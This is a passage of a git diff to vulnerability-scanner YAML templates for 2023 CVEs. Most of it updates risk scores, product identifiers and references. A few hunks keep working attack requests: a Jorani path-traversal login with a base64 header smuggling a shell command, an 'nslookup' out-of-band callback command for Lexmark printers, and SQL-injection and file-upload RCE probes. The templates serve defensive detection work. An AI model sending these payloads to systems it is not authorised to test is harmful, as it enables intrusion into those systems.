https://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2023-23161 + - http://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-23161 cwe-id: CWE-79 - epss-score: 0.00048 + epss-score: 0.00104 cpe: cpe:2.3:a:art_gallery_management_system_project:art_gallery_management_system:1.0:*:*:*:*:*:*:* + epss-percentile: 0.41822 metadata: max-request: 1 verified: true fofa-query: title="Art Gallery Management System" vendor: art_gallery_management_system_project product: art_gallery_management_system - tags: cve,cve2023,art,gallery,xss + tags: packetstorm,cve,cve2023,art,gallery,xss http: - method: GET diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index 96cd410637..ffe056c0cb 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23333 cwe-id: CWE-77 - epss-score: 0.6667 + epss-score: 0.63981 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.97411 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index b8b4fac6a8..a08544daa1 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23488 cwe-id: CWE-89 - epss-score: 0.03048 + epss-score: 0.02173 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87935 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index 2dbf4301d7..5f1d6c37c5 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23489 cwe-id: CWE-89 - epss-score: 0.13445 + epss-score: 0.22685 cpe: cpe:2.3:a:sandhillsdev:easy_digital_downloads:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.95881 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml index 9542b7aee4..d2b5caaae7 100644 --- a/http/cves/2023/CVE-2023-23491.yaml +++ b/http/cves/2023/CVE-2023-23491.yaml @@ -6,16 +6,25 @@ info: severity: medium description: | The Quick Event Manager WordPress Plugin, version < 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action. - remediation: Fixed in version 9.7.5 and above reference: - https://wpscan.com/vulnerability/49178a9d-0500-4e3e-8ea1-6cd4eeda2a4e - https://nvd.nist.gov/vuln/detail/CVE-2023-23491 + remediation: Fixed in version 9.7.5 and above classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2023-23491 + cwe-id: CWE-79 + epss-score: 0.00064 + cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.26173 metadata: max-request: 1 verified: true publicwww-query: "/wp-content/plugins/quick-event-manager" + framework: wordpress + vendor: fullworksplugins + product: quick_event_manager tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager http: diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml index dea063923d..3a9ae4c8c4 100644 --- a/http/cves/2023/CVE-2023-23492.yaml +++ b/http/cves/2023/CVE-2023-23492.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2023-23492 cwe-id: CWE-89 - epss-score: 0.00776 + epss-score: 0.03531 cpe: cpe:2.3:a:login_with_phone_number_project:login_with_phone_number:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.90359 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml index 55f54e0dae..3753a87c20 100644 --- a/http/cves/2023/CVE-2023-2356.yaml +++ b/http/cves/2023/CVE-2023-2356.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2023-2356 cwe-id: CWE-23 - epss-score: 0.00719 + epss-score: 0.00941 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* + epss-percentile: 0.81132 metadata: fofa-query: app="MLflow" max-request: 3 diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml index 82b9881e4c..21acbee659 100644 --- a/http/cves/2023/CVE-2023-23752.yaml +++ b/http/cves/2023/CVE-2023-23752.yaml @@ -16,8 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-23752 - epss-score: 0.61007 + epss-score: 0.49602 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* + epss-percentile: 0.97062 metadata: max-request: 2 shodan-query: html:"Joomla! - Open Source Content Management" diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml index ddf7539239..9895c9fd6d 100644 --- a/http/cves/2023/CVE-2023-24044.yaml +++ b/http/cves/2023/CVE-2023-24044.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24044 cwe-id: CWE-601 - epss-score: 0.00094 + epss-score: 0.00114 cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:* + epss-percentile: 0.44165 metadata: max-request: 1 fofa-query: title="Plesk Obsidian" diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml index a193fd3b54..00e7770053 100644 --- a/http/cves/2023/CVE-2023-24243.yaml +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-918 epss-score: 0.00448 cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:* + epss-percentile: 0.71868 metadata: fofa-query: icon_hash="163538942" max-request: 1 diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml index 9d928e706d..85ccbc7c73 100644 --- a/http/cves/2023/CVE-2023-24278.yaml +++ b/http/cves/2023/CVE-2023-24278.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.0009 cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* + epss-percentile: 0.37279 metadata: max-request: 1 shodan-query: http.favicon.hash:1099097618 diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml index c0197b526d..1be2ec92ab 100644 --- a/http/cves/2023/CVE-2023-24322.yaml +++ b/http/cves/2023/CVE-2023-24322.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00077 cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:* + epss-percentile: 0.31519 metadata: max-request: 1 shodan-query: html:"mojoPortal" diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml index fa0520e11e..0ee4ed3fa9 100644 --- a/http/cves/2023/CVE-2023-24488.yaml +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24488 cwe-id: CWE-79 - epss-score: 0.01605 + epss-score: 0.01498 cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* + epss-percentile: 0.85239 metadata: max-request: 2 shodan-query: title:"Citrix Gateway" diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index d7f470e7c5..e6129ff9b0 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -9,19 +9,21 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-24489 - https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/ + - https://support.citrix.com/article/CTX559517/sharefile-storagezones-controller-security-update-for-cve202324489 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-24489 - cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:* + epss-score: 0.9673 + cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* + epss-percentile: 0.99506 metadata: max-request: 256 shodan-query: title:"ShareFile Storage Server" verified: true vendor: citrix - product: sharefile_storagezones_controller - tags: cve,cve2023,sharefile,rce,intrusive,fileupload,fuzz - + product: sharefile_storage_zones_controller + tags: cve,cve2023,sharefile,rce,intrusive,fileupload,fuzz,kev variables: fileName: '{{rand_base(8)}}' @@ -39,10 +41,8 @@ http: } - payloads: padding: helpers/payloads/citrix_paddings.txt - threads: 30 stop-at-first-match: true matchers: diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml index 3d6098c88c..8002023070 100644 --- a/http/cves/2023/CVE-2023-24657.yaml +++ b/http/cves/2023/CVE-2023-24657.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00076 cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:* + epss-percentile: 0.31252 metadata: max-request: 2 shodan-query: html:"phpIPAM IP address management" diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml index 6a10d12925..58e87e394a 100644 --- a/http/cves/2023/CVE-2023-24733.yaml +++ b/http/cves/2023/CVE-2023-24733.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00064 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* + epss-percentile: 0.26173 metadata: max-request: 1 shodan-query: http.favicon.hash:1469328760 diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml index 429d0f70a8..61c06145a3 100644 --- a/http/cves/2023/CVE-2023-24735.yaml +++ b/http/cves/2023/CVE-2023-24735.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-24735 cwe-id: CWE-601 - epss-score: 0.01158 + epss-score: 0.00985 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* + epss-percentile: 0.81565 metadata: max-request: 1 shodan-query: http.favicon.hash:1469328760 diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml index b57d4eab3d..c0a520b74d 100644 --- a/http/cves/2023/CVE-2023-24737.yaml +++ b/http/cves/2023/CVE-2023-24737.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00064 cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:* + epss-percentile: 0.26173 metadata: max-request: 1 shodan-query: http.favicon.hash:1469328760 diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml index 082b9dddda..9cc6fb796a 100644 --- a/http/cves/2023/CVE-2023-25135.yaml +++ b/http/cves/2023/CVE-2023-25135.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25135 cwe-id: CWE-502 - epss-score: 0.65662 + epss-score: 0.74668 cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:* + epss-percentile: 0.97724 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml index 7d88fc7dcb..7574c6dc0c 100644 --- a/http/cves/2023/CVE-2023-25157.yaml +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25157 cwe-id: CWE-89 - epss-score: 0.49368 + epss-score: 0.3525 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* + epss-percentile: 0.96575 metadata: max-request: 3 shodan-query: title:"geoserver" diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml index affdceb27b..489e63406d 100644 --- a/http/cves/2023/CVE-2023-25346.yaml +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00089 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* + epss-percentile: 0.36851 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml index faf39ef52c..47a6952711 100644 --- a/http/cves/2023/CVE-2023-25717.yaml +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-25717 cwe-id: CWE-94 - epss-score: 0.95567 + epss-score: 0.96566 cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:* + epss-percentile: 0.99438 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml index 9652861d74..1ef2d7949c 100644 --- a/http/cves/2023/CVE-2023-26067.yaml +++ b/http/cves/2023/CVE-2023-26067.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.1 cve-id: CVE-2023-26067 cwe-id: CWE-20 - epss-score: 0.00145 + epss-score: 0.02039 cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:* + epss-percentile: 0.87518 metadata: max-request: 1 verified: true @@ -26,8 +27,6 @@ info: vendor: lexmark product: cxtpc_firmware tags: cve,cve2023,printer,iot,lexmark - - variables: cmd: 'nslookup {{interactsh-url}}' @@ -47,4 +46,4 @@ http: - contains(interactsh_protocol, 'dns') - contains(body, 'Fax Trace Settings') - status_code == 200 - condition: and \ No newline at end of file + condition: and diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml index 600226c91e..c91bcbc7f2 100644 --- a/http/cves/2023/CVE-2023-26255.yaml +++ b/http/cves/2023/CVE-2023-26255.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2023-26255 cwe-id: CWE-22 - epss-score: 0.14359 + epss-score: 0.14175 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* + epss-percentile: 0.94985 metadata: max-request: 1 shodan-query: title:Jira diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml index 6e654a4214..138e152e24 100644 --- a/http/cves/2023/CVE-2023-26256.yaml +++ b/http/cves/2023/CVE-2023-26256.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2023-26256 cwe-id: CWE-22 - epss-score: 0.01245 + epss-score: 0.00612 cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:* + epss-percentile: 0.76007 metadata: max-request: 1 shodan-query: title:Jira diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml index 07fe5eb98b..2c00123b54 100644 --- a/http/cves/2023/CVE-2023-26360.yaml +++ b/http/cves/2023/CVE-2023-26360.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.6 cve-id: CVE-2023-26360 cwe-id: CWE-284 - epss-score: 0.85734 + epss-score: 0.90844 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* + epss-percentile: 0.98442 metadata: max-request: 1 shodan-query: http.component:"Adobe ColdFusion" diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml index 865706cb4f..1ebcc32b1a 100644 --- a/http/cves/2023/CVE-2023-26469.yaml +++ b/http/cves/2023/CVE-2023-26469.yaml @@ -5,24 +5,28 @@ info: author: pussycat0x severity: critical description: | - Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server. + Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-26469 - https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py - https://github.com/advisories/GHSA-7r9h-9r47-7vjj - http://packetstormsecurity.com/files/174248/Jorani-Remote-Code-Execution.html + - https://jorani.org/security-features-in-lms.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2023-26469 cwe-id: CWE-22 epss-score: 0.22328 cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:* + epss-percentile: 0.95851 metadata: max-request: 3 shodan-query: http.favicon.hash:-2032163853 verified: true + vendor: jorani + product: jorani tags: cve,cve2023,jorani,rce,packetstorm - variables: cmd: "id" payload: "" @@ -33,14 +37,12 @@ http: - | GET /session/login HTTP/1.1 Host: {{Hostname}} - - | POST /session/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword - - | GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1 Host: {{Hostname}} @@ -48,6 +50,7 @@ http: {{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}} cookie-reuse: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index a942f017f6..56d1b12a28 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00148 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* + epss-percentile: 0.50119 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index a57eb88b65..2e1afdac65 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00146 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* + epss-percentile: 0.49905 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml index 802e556575..7e37877921 100644 --- a/http/cves/2023/CVE-2023-27008.yaml +++ b/http/cves/2023/CVE-2023-27008.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00081 cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:* + epss-percentile: 0.33383 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml index 7983f0f4ab..2f5722fa01 100644 --- a/http/cves/2023/CVE-2023-27034.yaml +++ b/http/cves/2023/CVE-2023-27034.yaml @@ -1,4 +1,5 @@ id: CVE-2023-27034 + info: name: Blind SQL injection vulnerability in Jms Blog author: MaStErChO @@ -9,14 +10,21 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034 - https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html - https://github.com/advisories/GHSA-7jr7-v6gv-m656 + - https://friends-of-presta.github.io/security-advisories/modules/2023/03/13/jmsblog.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-27034 cwe-id: CWE-89 + epss-score: 0.00572 + cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:* + epss-percentile: 0.75071 metadata: max-request: 2 - tags: cve,cve2023,prestashop,prestashop-module,sqli + framework: prestashop + vendor: joommasters + product: jms_blog + tags: cve,cve2023,prestashop,prestashop-module,sqli,intrusive http: - raw: @@ -54,12 +62,12 @@ http: submitComment= ------------YWJkMTQzNDcw-- - - | GET /modules/jmsblog/config.xml HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true + matchers-condition: and matchers: - type: dsl diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml index 57a97024b7..d907130349 100644 --- a/http/cves/2023/CVE-2023-27159.yaml +++ b/http/cves/2023/CVE-2023-27159.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27159 cwe-id: CWE-918 - epss-score: 0.00265 + epss-score: 0.00262 cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* + epss-percentile: 0.63161 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml index cf354990bd..dedc8beb52 100644 --- a/http/cves/2023/CVE-2023-27179.yaml +++ b/http/cves/2023/CVE-2023-27179.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2023-27179 cwe-id: CWE-434 - epss-score: 0.03179 + epss-score: 0.03737 cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:* + epss-percentile: 0.9061 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml index 9936ff6ad8..09aea3ea9d 100644 --- a/http/cves/2023/CVE-2023-27292.yaml +++ b/http/cves/2023/CVE-2023-27292.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-601 epss-score: 0.00073 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* + epss-percentile: 0.30323 metadata: max-request: 2 shodan-query: title:"opencats" diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml index 09e52fab98..16273ab8a9 100644 --- a/http/cves/2023/CVE-2023-2732.yaml +++ b/http/cves/2023/CVE-2023-2732.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-288 epss-score: 0.04948 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.91796 metadata: max-request: 2 verified: true diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml index 5708da6b4b..69d95c8135 100644 --- a/http/cves/2023/CVE-2023-27350.yaml +++ b/http/cves/2023/CVE-2023-27350.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27350 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.97118 + epss-score: 0.97086 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* + epss-percentile: 0.99667 metadata: max-request: 10 shodan-query: http.html:"PaperCut" diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml index 5b29201bfe..acc1ab25e6 100644 --- a/http/cves/2023/CVE-2023-27372.yaml +++ b/http/cves/2023/CVE-2023-27372.yaml @@ -16,8 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-27372 - epss-score: 0.97073 + epss-score: 0.97084 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* + epss-percentile: 0.99665 metadata: max-request: 2 shodan-query: html:"spip.php?page=backend" diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml index 28179a62ff..dabb86049c 100644 --- a/http/cves/2023/CVE-2023-27482.yaml +++ b/http/cves/2023/CVE-2023-27482.yaml @@ -22,6 +22,7 @@ info: cwe-id: CWE-287 epss-score: 0.03052 cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:* + epss-percentile: 0.89691 metadata: max-request: 3 verified: true diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml index 98d771a318..c149df55e1 100644 --- a/http/cves/2023/CVE-2023-27524.yaml +++ b/http/cves/2023/CVE-2023-27524.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-27524 cwe-id: CWE-1188 - epss-score: 0.71231 + epss-score: 0.65287 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* + epss-percentile: 0.97448 metadata: max-request: 45 verified: true diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml index 04c63b726a..2f61511195 100644 --- a/http/cves/2023/CVE-2023-27587.yaml +++ b/http/cves/2023/CVE-2023-27587.yaml @@ -18,8 +18,9 @@ info: cvss-score: 6.5 cve-id: CVE-2023-27587 cwe-id: CWE-209 - epss-score: 0.13712 + epss-score: 0.11296 cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:* + epss-percentile: 0.94464 metadata: max-request: 1 vendor: readtomyshoe_project diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml index 8e2004aa8d..b19ca5e344 100644 --- a/http/cves/2023/CVE-2023-2780.yaml +++ b/http/cves/2023/CVE-2023-2780.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2780 cwe-id: CWE-29 - epss-score: 0.01159 + epss-score: 0.01547 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* + epss-percentile: 0.85528 metadata: max-request: 3 shodan-query: http.title:"mlflow" diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 82a791d7d5..3e81d70577 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -10,14 +10,16 @@ info: - https://www.wordfence.com/threat-intel/vulnerabilities/id/dba3f3a6-3f55-4f4e-98e4-bb98d9c94bdd - https://wpscan.com/vulnerability/e9ef793c-e5a3-4c55-beee-56b0909f7a0d - https://nvd.nist.gov/vuln/detail/CVE-2023-2796 + - http://packetstormsecurity.com/files/173984/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html remediation: Fixed in version 2.1.2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-2796 cwe-id: CWE-862 - epss-score: 0.00391 + epss-score: 0.20197 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.95694 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index 263eda8817..0f01b584b9 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -17,8 +17,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28121 cwe-id: CWE-287 - epss-score: 0.72766 + epss-score: 0.93782 cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.98781 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml index 88e59ad6d1..aa87c7ef87 100644 --- a/http/cves/2023/CVE-2023-2822.yaml +++ b/http/cves/2023/CVE-2023-2822.yaml @@ -17,8 +17,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2822 cwe-id: CWE-79 - epss-score: 0.01934 + epss-score: 0.02305 cpe: cpe:2.3:a:ellucian:ethos_identity:*:*:*:*:*:*:*:* + epss-percentile: 0.88289 metadata: max-request: 1 shodan-query: html:"Ellucian Company" diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml index 943f2023dc..4de1244a21 100644 --- a/http/cves/2023/CVE-2023-2825.yaml +++ b/http/cves/2023/CVE-2023-2825.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-22 epss-score: 0.02752 cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* + epss-percentile: 0.89231 metadata: max-request: 16 shodan-query: title:"Gitlab" diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 929a3a522b..88ec791244 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-28343 cwe-id: CWE-78 - epss-score: 0.39796 + epss-score: 0.3827 cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:* + epss-percentile: 0.96725 metadata: max-request: 1 google-query: intitle:"Altenergy Power Control Software" diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index b535f4edbd..20d78c0dbf 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -18,8 +18,9 @@ info: cvss-score: 7.5 cve-id: 